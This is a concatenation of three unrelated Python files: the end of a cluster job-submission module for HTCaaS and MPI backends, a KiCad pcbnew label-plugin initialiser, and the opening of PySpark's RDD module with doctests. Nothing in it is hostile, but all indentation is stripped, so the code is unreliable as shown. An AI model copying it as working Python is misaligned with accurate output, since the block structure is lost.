dico = {'cwd':cwd, 'input_files': ' '.join(input_files + [prog]), 'stdout': stdout, 'prog':prog,
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
command = ['htcaas-mgjob-submit','-d',cwd,'-e',temp_file_name]
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
logger.debug(id)
nb_try=0
nb_limit=5
if not id.isdigit() :
print "[ID is not digit]:" + id
while not id.isdigit() :
nb_try+=1
print "[fail_retry]:"+ nb_try
a=misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
if nb_try > nb_limit :
raise ClusterManagementError, 'fail to submit to the HTCaaS cluster: \n %s' % id
break
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try(nb_try=10, sleep=5)
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
if id == 0 :
status_out ='C'
else :
cmd = 'htcaas-job-status -m '+str(id)+ " -s | grep Status "
status = misc.Popen([cmd], shell=True,stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read()
if status.returncode or error:
raise ClusterManagmentError, 'htcaas-job-submit returns error: %s' % error
status_out= status.stdout.read().strip()
status_out= status_out.split(":",1)[1]
if status_out == 'waiting':
status_out='I'
elif status_out == 'preparing' or status_out == 'running':
status_out = 'R'
elif status_out != 'done':
status_out = 'F'
elif status_out == 'done':
status_out = 'C'
return status_out
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
logger.debug("self.submitted_ids not exists")
return 0, 0, 0, 0
ongoing = []
idle, run, fail = 0, 0, 0
start = self.submitted_ids[0]
end = self.submitted_ids[-1]
cmd = "htcaas-job-status -c "+str(start)+"-"+str(end)#+" -ac"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
#ongoing.append(line.split()[0].strip())
status2 = line.split()[-1]
if status2 is not 'null' or line.split()[0].strip() is not '0':
ongoing.append(line.split()[0].strip())
logger.debug("["+line.split()[0].strip()+"]"+status2)
if status2 is 'null' or line.split()[0].strip() is '0':
idle += 1
elif status2 in self.idle_tag:
idle += 1
elif status2 in self.running_tag:
run += 1
elif status2 in self.complete_tag:
if not self.check_termination(line.split()[0]):
idle +=1
else:
fail += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobson the cluster"""
if not self.submitted_ids:
return
for i in range(len(self.submitted_ids)):
cmd = "htcaas-job-cancel -m %s" % self.submitted_ids[i]
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
class HTCaaS2Cluster(Cluster):
"""Class for dealing with cluster submission on a HTCaaS cluster without GPFS """
name= 'htcaas2'
job_id = 'HTCAAS2_JOBID'
idle_tag = ['waiting']
running_tag = ['preparing','running']
complete_tag = ['done']
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the HTCaaS job on the cluster with NO SHARE DISK
input/output file should be given as relative to CWD
"""
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if 'combine' not in prog and 'pythia' not in prog and 'shower' not in prog :
if cwd or prog :
self.submitted_dirs.append(cwd)
self.submitted_exes.append(prog)
else:
logger.debug("cwd and prog not exist->"+cwd+" / "+ os.path.basename(prog))
if argument :
self.submitted_args.append('='.join([str(a) for a in argument]))
if cwd or prog :
self.submitted += 1
id = self.submitted
self.submitted_ids.append(id)
else:
logger.debug("cwd and prog are not exist! ")
id = 0
else:
temp_file_name = "sub."+ os.path.basename(prog)
text = """#!/bin/bash
MYPWD=%(cwd)s
cd $MYPWD
input_files=(%(input_files)s )
for i in ${input_files[@]}
do
chmod -f +x $i
done
/bin/bash %(prog)s %(arguments)s > %(stdout)s
"""
dico = {'cwd':cwd, 'input_files': ' '.join(input_files + [prog]), 'stdout': stdout, 'prog':prog,
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
command = ['htcaas-mgjob-submit','-d',cwd,'-e',new_prog]
a = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=cwd)
id = a.stdout.read().strip()
logger.debug("[mode2]-["+str(id)+"]")
if cwd and prog :
self.submitted += 1
self.submitted_ids.append(id)
else:
logger.debug("cwd and prog are not exist! ")
id = 0
return id
@multiple_try()
def metasubmit(self, me_dir=None):
if self.submitted > 1100 and self.submitted == len(self.submitted_ids):
tmp_leng= len(self.submitted_ids)/2
tmp_dirs1= self.submitted_dirs[0:tmp_leng]
tmp_dirs2= self.submitted_dirs[tmp_leng:]
tmp_exes1= self.submitted_exes[0:tmp_leng]
tmp_exes2= self.submitted_exes[tmp_leng:]
command1 = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in tmp_dirs1 if a and a is not ' ']),
'-e', ":".join([str(a) for a in tmp_exes1 if a and a is not ' '])]
command2 = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in tmp_dirs2 if a and a is not ' ']),
'-e', ":".join([str(a) for a in tmp_exes2 if a and a is not ' '])]
if len(self.submitted_args) > 0 :
tmp_args1= self.submitted_args[0:tmp_leng]
tmp_args2= self.submitted_args[tmp_leng:]
command1.extend(['-a', ':'.join([str(a) for a in tmp_args1])])
command2.extend(['-a', ':'.join([str(a) for a in tmp_args2])])
result1 = misc.Popen(command1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
result2 = misc.Popen(command2, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
me_dir = str(result1.stdout.read().strip())+ "//" + str(result2.stdout.read().strip())
elif self.submitted > 0 and self.submitted == self.submitted_ids[-1]:
command = ['htcaas-mgjob-submit','-d',":".join([str(a) for a in self.submitted_dirs if a and a is not ' ']),
'-e', ":".join([str(a) for a in self.submitted_exes if a and a is not ' '])]
if len(self.submitted_args) > 0 :
command.extend(['-a', ':'.join([str(a) for a in self.submitted_args])])
if self.submitted_dirs[0] or self.submitted_exes[0] :
result = misc.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
me_dir = result.stdout.read().strip()
self.submitted_ids[0]=me_dir
else:
me_dir = self.submitted_ids[-1]
elif self.submitted > 0 and self.submitted != self.submitted_ids[-1]:
me_dir = self.submitted_ids[0]
else:
me_dir = -1
logger.debug("[" + str(me_dir) + "]")
self.submitted_dirs = []
self.submitted_exes = []
self.submitted_args = []
return me_dir
@multiple_try(nb_try=10, sleep=5)
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
#logger.debug("CONTROL ONE JOB MODE")
if self.submitted == self.submitted_ids[-1] :
id = self.metasubmit(self)
tempid = self.submitted_ids[-1]
self.submitted_ids.remove(self.submitted_ids[-1])
self.submitted_ids.append(id)
logger.debug(str(id)+" // "+str(self.submitted_ids[-1]))
if id == 0 :
status_out ='C'
else:
cmd = 'htcaas-job-status -m '+ str(id) + " -s | grep Status "
status = misc.Popen([cmd],shell=True,stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read()
if status.returncode or error:
raise ClusterManagmentError, 'htcaas-job-status returns error: %s' % error
status_out= status.stdout.read().strip()
status_out= status_out.split(":",1)[1]
logger.debug("[["+str(id)+"]]"+status_out)
if status_out == 'waiting':
status_out='I'
elif status_out == 'preparing' or status_out == 'running':
status_out = 'R'
elif status_out != 'done':
status_out = 'F'
elif status_out == 'done':
status_out = 'C'
self.submitted -= 1
return status_out
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
logger.debug("self.submitted_ids not exists")
return 0, 0, 0, 0
if "//" in me_dir :
if int(me_dir.split("//")[0]) < int(me_dir.split("//")[1]) :
start = me_dir.split("//")[0]
end = me_dir.split("//")[1]
else :
start = me_dir.split("//")[1]
end = me_dir.split("//")[0]
elif "/" in me_dir : # update
start = 0
end = 0
elif me_dir.isdigit():
start = me_dir
end = me_dir
elif not me_dir.isdigit():
me_dir = self.submitted_ids[0]
logger.debug("Meta_ID is not digit(control), self.submitted_ids[0]: "+str(me_dir) )
ongoing = []
idle, run, fail, done = 0, 0, 0, 0
cmd = "htcaas-job-status -c "+str(start)+"-"+str(end) +" -ac"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
status2 = line.split()[-1]
if status2 is not 'null' or line.split()[0].strip() is not '0':
ongoing.append(str(line.split()[0].strip())+"-"+str(line.split()[1].strip()))
logger.debug("["+line.split()[0].strip()+"-"+line.split()[1].strip()+"]"+status2)
if status2 is 'null' or line.split()[0].strip() is '0':
idle += 1
elif status2 in self.idle_tag:
idle += 1
elif status2 in self.running_tag:
run += 1
elif status2 in self.complete_tag:
done += 1
self.submitted -= 1
if not self.check_termination(line.split()[1]):
idle +=1
else:
fail += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobson the cluster"""
if not self.submitted_ids:
return
id = self.submitted_ids[0]
if id is not 0 :
cmd = "htcaas-job-cancel -m %s" % str(id)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
class MPICluster(Cluster):
""" Dummy cluster implementation for now, to be used when using MPI. """
name = 'MPICluster'
identifier_length = 10
def __init__(self, mpi_rank, mpi_size, **opts):
"""Init the cluster"""
self.mpi_rank = mpi_rank
self.nb_core = mpi_size
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, required_output=[], nb_submit=0):
"""How to make one submission. Return status id on the cluster."""
raise NotImplemented, 'No implementation of submit in cluster type \'%s\'' % self.name
#@store_input()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""How to make one submission. Return status id on the cluster.
NO SHARE DISK"""
raise NotImplemented, 'No implementation of submit2 in cluster type \'%s\'' % self.name
def cluster_submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0, packet_member=None):
"""This function wrap the cluster submition with cluster independant
method should not be overwritten (but for DAG type submission)"""
raise NotImplemented, 'No implementation of cluster_submit in cluster type \'%s\'' % self.name
def control(self, me_dir=None):
"""Check the status of job associated to directory me_dir. return (idle, run, finish, fail)"""
raise NotImplemented, 'No implementation of control in cluster type \'%s\'' % self.name
def control_one_job(self, pid):
""" control the status of a single job with it's cluster id """
raise NotImplemented, 'No implementation of control_one_job in cluster type \'%s\'' % self.name
def get_jobs_identifier(self, path, second_path=None):
"""get a unique run_name for all the jobs helps to identify the runs
in the controller for some cluster."""
raise NotImplemented, 'No implementation of get_jobs_identifier in cluster type \'%s\'' % self.name
#@check_interupt()
def wait(self, me_dir, fct, minimal_job=0, update_first=None):
"""Wait that all job are finish.
if minimal_job set, then return if idle + run is lower than that number"""
raise NotImplemented, 'No implementation of wait in cluster type \'%s\'' % self.name
def check_termination(self, job_id):
"""Check the termination of the jobs with job_id and relaunch it if needed."""
raise NotImplemented, 'No implementation of check_termination in cluster type \'%s\'' % self.name
#@check_interupt()
def launch_and_wait(self, prog, argument=[], cwd=None, stdout=None,
stderr=None, log=None, required_output=[], nb_submit=0,
input_files=[], output_files=[]):
"""launch one job on the cluster and wait for it"""
raise NotImplemented, 'No implementation of launch_and_wait in cluster type \'%s\'' % self.name
def remove(self, *args, **opts):
""" """
raise NotImplemented, 'No implementation of remove in cluster type \'%s\'' % self.name
#@store_input()
def metasubmit(self, me_dir):
raise NotImplemented, 'No implementation of metasubmit in cluster type \'%s\'' % self.name
from_name = {'condor':CondorCluster, 'pbs': PBSCluster, 'sge': SGECluster,
'lsf': LSFCluster, 'ge':GECluster, 'slurm': SLURMCluster,
'htcaas':HTCaaSCluster, 'htcaas2':HTCaaS2Cluster}
onecore=MultiCore(1) # create a thread to run simple bash job without having to
#fork the main process
|
__init__.py
|
import os
import sys
import subprocess
import threading
import time
import wx
import wx.aui
from wx import FileConfig
import pcbnew
from dialog import Dialog
def check_for_bom_button():
# From Miles McCoo's blog
# https://kicad.mmccoo.com/2017/03/05/adding-your-own-command-buttons-to-the-pcbnew-gui/
def find_pcbnew_window():
windows = wx.GetTopLevelWindows()
pcbneww = [w for w in windows if "pcbnew" in w.GetTitle().lower()]
if len(pcbneww) != 1:
return None
return pcbneww[0]
def callback(_):
plugin.Run()
path = os.path.dirname(__file__)
while not wx.GetApp():
time.sleep(1)
bm = wx.Bitmap(path + '/icon.png', wx.BITMAP_TYPE_PNG)
button_wx_item_id = 0
from pcbnew import ID_H_TOOLBAR
while True:
time.sleep(1)
pcbnew_window = find_pcbnew_window()
if not pcbnew_window:
continue
top_tb = pcbnew_window.FindWindowById(ID_H_TOOLBAR)
if button_wx_item_id == 0 or not top_tb.FindTool(button_wx_item_id):
top_tb.AddSeparator()
button_wx_item_id = wx.NewId()
top_tb.AddTool(button_wx_item_id, "KiBuzzard", bm,
"Execute Buzzard script", wx.ITEM_NORMAL)
top_tb.Bind(wx.EVT_TOOL, callback, id=button_wx_item_id)
top_tb.Realize()
class KiBuzzardPlugin(pcbnew.ActionPlugin, object):
config_file = os.path.join(os.path.dirname(__file__), '..', 'config.ini')
buzzard_path = os.path.join(os.path.dirname(__file__), '..', 'deps', 'buzzard')
def __init__(self):
super(KiBuzzardPlugin, self).__init__()
self.name = "Create Labels"
self.category = "Modify PCB"
self.pcbnew_icon_support = hasattr(self, "show_toolbar_button")
self.show_toolbar_button = True
icon_dir = os.path.dirname(os.path.dirname(__file__))
self.icon_file_name = os.path.join(icon_dir, 'icon.png')
self.description = "Create Labels"
self.config = FileConfig(localFilename=self.config_file)
self._pcbnew_frame = None
def defaults(self):
pass
def Run(self):
buzzard_script = os.path.join(self.buzzard_path, 'buzzard.py')
if self._pcbnew_frame is None:
self._pcbnew_frame = [x for x in wx.GetTopLevelWindows() if 'pcbnew' in x.GetTitle().lower() and not 'python' in x.GetTitle().lower()][0]
def run_buzzard(str):
import re
str = str + ' -o ki -stdout'
args = [a.strip('"') for a in re.findall('".+?"|\S+', str)]
# Execute Buzzard
process = None
if sys.platform.startswith('linux'):
process = subprocess.Popen(['python', buzzard_script] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
process = subprocess.Popen(['C:\\Python38\\python.exe', buzzard_script] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = process.communicate()
if stderr:
wx.MessageBox(stderr, 'Error', wx.OK | wx.ICON_ERROR)
# check for errors
error_line = [s for s in stderr.decode('utf8').split('\n') if 'error' in s]
if len(error_line) > 0:
wx.MessageBox(error_line[0], 'Error', wx.OK | wx.ICON_ERROR)
else:
# Copy footprint into clipboard
if sys.platform.startswith('linux'):
clip_args = ['xclip', '-sel', 'clip', '-noutf8']
else:
clip_args = ['clip.exe']
process = subprocess.Popen(clip_args, stdin=subprocess.PIPE)
process.communicate(stdout)
dlg.EndModal(wx.ID_OK)
dlg = Dialog(self._pcbnew_frame, self.config, self.buzzard_path, run_buzzard)
try:
if dlg.ShowModal() == wx.ID_OK:
# Set focus to main window and execute a Paste operation
self._pcbnew_frame.Raise()
wx.Yield()
keyinput = wx.UIActionSimulator()
keyinput.Char(ord("V"), wx.MOD_CONTROL)
finally:
self.config.Flush()
dlg.Destroy()
plugin = KiBuzzardPlugin()
plugin.register()
# Add a button the hacky way if plugin button is not supported
# in pcbnew, unless this is linux.
if not plugin.pcbnew_icon_support and not sys.platform.startswith('linux'):
t = threading.Thread(target=check_for_bom_button)
t.daemon = True
t.start()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return h
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1] not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = socket.socket()
sock.settimeout(3)
try:
sock.connect(("localhost", port))
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY_SER}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
